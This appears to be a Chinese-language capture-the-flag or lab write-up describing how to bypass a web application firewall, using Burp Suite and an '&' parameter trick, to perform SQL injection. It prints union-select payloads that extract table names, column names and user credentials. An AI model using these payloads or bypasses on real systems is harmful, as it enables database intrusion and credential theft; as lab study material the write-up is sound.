前期判断

一进来就看到说有WAF，赶紧去试试拦截了什么。

感觉不对啊，这防火墙是不是出问题了。
看起来真出问题了，赶紧去看看源码，index.php的文件就是本界面，可以看出来没有任何过滤。

还有两个分别是诸如被拦截的页面和有防火墙的页面。

诸如被拦截的界面。

有WAF的界面。

测试发现大部分符号都被拦截了。

注入

方法一：中间人

突然有几个问题，是否为前端判断，能否用中间人方法绕过WAF，抓包丢进burp suite的Repeater里面测试一下，能看到貌似绕过了WAF。

英文单引号注入，注意在burpsuite里面id=后面的参数之间不能有空格，要不然burpsuite会认为用空格相隔的就不是参数，就会出现错误请求。

简而言之就是想办法让id=后面的参数都是同一个颜色（此处是绿色），这应该是众多方法之一。

判断行数。

判断表名。

-1'union(select(1),2,group_concat(table_name)from(information_schema.tables)where(table_schema=database()))--+

判断列名。

-1'union(select(1),2,group_concat(column_name)from(information_schema.columns)where(table_name='users'))--+

值

-1'union(select(1),group_concat(username),group_concat(password)from(users))--+

方法二：

先测试一下看看那些字符没有被拦截，以便利用。

发现"&",没有被过滤，该怎么利用呢。
可以看到本来被过滤的字符跟在&后面就能够使用了。

表名。

1&id=-1' union select null,null,group_concat(table_name) from information_schema.tables where table_schema=database()--+